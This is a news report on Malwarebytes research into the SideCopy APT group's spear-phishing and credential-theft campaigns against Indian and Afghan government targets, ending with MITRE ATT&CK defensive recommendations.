Report: SideCopy APT Used New Tactics in Recent AttacksPakistan-Linked Group's Attacks Show Increased Capability
The SideCopy APT group's attacks on military and government institutions in India and Afghanistan used new lures and payload delivery mechanisms, according to a report by researchers at threat intelligence firm Malwarebytes.
The researchers at Malwarebytes tell Information Security Media Group the primary objective of the Pakistan-linked threat group, which has been active since 2019, is to steal sensitive military and government information.
The researchers point out that improved, more capable payloads and lures, the use of a dashboard that monitors the APT group's targets and malware payloads in real time, as well as a new auto stealer that can be sideloaded, are indications that SideCopy is amping up its attack capabilities for future, more widespread exploits.
In India, SideCopy targeted the Indian Army, the National Cadet Corps of India and the National Council of Educational Research and Training, or NCERT, an autonomous institution under the government of India focused on improving school education in the country, the report says. None of the targets have publicly addressed the cyber incidents at their respective institutions or responded to ISMG's request for details.
In Afghanistan, the APT group targeted at least 14 government officials, especially those related to foreign affairs, the report says.
The attacks enabled the group to gain access to the two countries' government portals and steal banking information, password-protected documents, and Facebook, Twitter and Google account credentials of undisclosed government officials, according to the researchers.
In both the India and Afghanistan attacks, the researchers say, the SideCopy APT group infected victims' machines using one of its generic lures and gained access to a shared machine to collect the credentials.
Lures in India Attacks
The lure SideCopy used to target the Indian Army was an archive file containing a malicious link, which loaded a PDF file named "Email facility address list of the ERE units: 20 Sept 2021," the report says.
SideCopy's strategy to target NCERT was similar. The decoy, in this case, was the curriculum of a course named “Living the values, a value-narrative to grass-root leadership," the researchers say.
SideCopy, which has been linked to the Transparent Tribe APT group by Cisco Talos, the threat intelligence arm of software company Cisco, derives its name from its attack strategy of using an infection chain that emulates that of India-based SideWinder APT group, according to the researchers.
According to Cisco Talos' report, SideCopy's infrastructure setup indicates a special interest in Pakistani and Indian victims.
In November 2021, Facebook parent Meta's threat intelligence analysts removed social media accounts of a group of hackers from Pakistan linked to SideCopy. The company says it then rolled out security measures for Afghanistan citizens, who were targeted by the group on the social media platform.
Thailand's Computer Emergency Response Team or Thai CERT, has also linked SideCopy with Pakistan. It says that the APT group may also have links with the Transparent Tribe and APT 36 threat groups - both well-known Pakistan-based APT groups.
Details of Afghanistan Attacks
The group stole several Microsoft Office documents and databases belonging to the government of Afghanistan, the report says. This includes visas and diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan and the asset registration and verification authority database of the general director of administrative affairs of the government of Afghanistan.
The threat group carried out successful spear-phishing attacks on 10 undisclosed government members of the Administration Office of the President of Afghanistan, the report says. The group stole credentials of different government and bank services, as well as the officials' personal Google, Twitter and Facebook accounts, it says.
SideCopy also infected two members of Afghanistan's Ministry of Finance, but only succeeded in collecting their bank account details and personal information from Google and Facebook accounts, the researchers say.
The group also stole an Afghanistan National Procurement Authority official's credentials to Google, Twitter, Facebook, Instagram and Pinterest accounts, as well as their access to the government services account.
The researchers say that SideCopy primarily uses archived files to target victims in spam or spear-phishing campaigns. These archived files have an embedded link - a file extension used by Microsoft Windows to locate an executable file, or an MS Office or Trojanized application that is used to call MSHTA, which is an interpreter for Microsoft Scripting Host that helps download and execute HTML applications.
These HTML application files perform "fileless" payload execution to deploy one of the remote access Trojans, or RATs, that in the past have been used by threat actors including AllaKore and Action Rat.
At the back end, the researchers found that each archive file SideCopy sends to its victims is a unique package with its own payloads, which are mostly hosted on compromised domains. SideCopy also has a system named Scout to individually monitor each package, they say.
The group has a dashboard that displays all the infected machines with individual package information, including the target's IP address, name of the package, the machine's operating system and version, user-agent, browser information, country and status of the victim.
According to the researchers, SideCopy uses two variants of the stealer - HTTP and TCP - to perform the exfiltration.
Evasion Detection Mechanisms
The researchers tell ISMG that SideCopy uses three techniques to bypass security mechanisms.
The first is Dynamic Link Library, or DLL, sideloading. "In this method, the group uses legitimate applications to sideload the malicious payloads. This technique can bypass some of the security mechanisms," the researchers say.
SideCopy APT also checks the antivirus products and installed security products. It then carries out additional process to make sure its malware can bypass the installed security products, they say.
The third technique, according to the researchers, is the use of MS HTML applications. The actor used MS HTML to download and execute additional payloads.
Advice for Security Leaders
As the SideCopy APT group uses the Microsoft HTML application, the MITRE ATT&CK advises organizations to deploy application control configured to block execution of mshta.exe files.
For Windows 10 and Windows Server 2016 and above, MITRE ATT&CK's advisory says Windows Defender Application Control policy rules may be applied to block the mshta.exe application and to prevent abuse.
To deal with spear-phishing attacks, a common tactic used by numerous APT groups including SideCopy, MITRE ATT&CK recommends that organizations deploy network intrusion prevention systems. Organizations could also use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain.
Having intruded an organization's network, SideCopy uses legitimate external web services to exfiltrate data. MITRE ATT&CK says that analyzing network data for uncommon data flows and using behavior monitoring could help organizations detect abnormal patterns of activity and thereby take corrective action.